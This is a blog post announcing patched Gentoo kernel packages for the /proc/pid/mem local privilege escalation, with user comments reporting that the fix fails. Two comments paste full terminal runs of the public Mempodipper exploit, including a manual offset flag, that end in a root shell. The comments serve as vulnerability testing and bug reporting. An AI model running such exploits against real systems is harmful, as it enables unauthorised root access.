Gentoo Kernel release for Linux Local Privilege Escalation via SUID /proc/pid/mem

I just released gentoo-sources-3.2.1-r1 with the fix for the Linux local privilege escalation via SUID /proc/pid/mem.

I plan on creating releases for additional kernels with this patch throughout the day.

See the link for more info on the privilege escalation.

The following kernel versions contain the patch:

gentoo-sources-3.2.1-r1

gentoo-sources-3.1.10

gentoo-sources-3.0.17-r1


4 Comments

  1. Oliver

    Hi,

    just emerged gentoo-sources-3.2.1-r1 and installed it. Tried the exploit and it still works:

    uname -a
    Linux mobilebox 3.2.1-gentoo-r1 #1 SMP Mon Jan 23 22:23:22 CET 2012 x86_64 Intel(R) Core(TM) i5 CPU M 480 @ 2.67GHz GenuineIntel GNU/Linux

    ./mempodipper
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/4024/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Reading su for exit@plt.
    [+] Resolved exit@plt to 0x402178.
    [+] Calculating su padding.
    [+] Seeking to offset 0x40216c.
    [+] Executing su with shellcode.
    sh-4.2# whoami
    root

    Cheers,

    Oliver

  2. Oliver

    Additional info:
    seems like the patch is not applied:
    /usr/src $ diff linux-3.2.1-gentoo-r1/fs/proc/base.c linux-3.2.1-gentoo/fs/proc/base.c
    /usr/src $

    (just deny the posting of my comments on this blog…)

    Cheers,
    Oliver

  3. Yuri

    guv@noname ~/bin $ uname -a
    Linux noname.neo 3.1.10-gentoo #1 SMP Tue Jan 24 11:31:39 YEKT 2012 x86_64 Intel(R) Celeron(R) CPU E3300 @ 2.50GHz GenuineIntel GNU/Linux
    guv@noname ~/bin $ ./mempodipper -o 0x402178
    ===============================
    = Mempodipper =
    = by zx2c4 =
    = Jan 21, 2012 =
    ===============================

    [+] Opening socketpair.
    [+] Waiting for transferred fd in parent.
    [+] Executing child from child fork.
    [+] Opening parent mem /proc/10330/mem in child.
    [+] Sending fd 5 to parent.
    [+] Received fd at 5.
    [+] Assigning fd 5 to stderr.
    [+] Calculating su padding.
    [+] Seeking to offset 0x40215d.
    [+] Executing su with shellcode.
    sh-4.2# suid
    sh: suid: command not found
    sh-4.2# uid
    sh: uid: command not found
    sh-4.2# id
    uid=0(root) gid=0(root) groups=0(root),6(disk),10(wheel),18(audio),19(cdrom),27(video),46(plugdev),80(cdrw),85(usb),104(power),199(messagebus)
    sh-4.2# whoami
    root
    sh-4.2# exit
    exit

  4. noother

    I just upgraded to 3.2.1-r1 and unfortunately, the exploit still works.
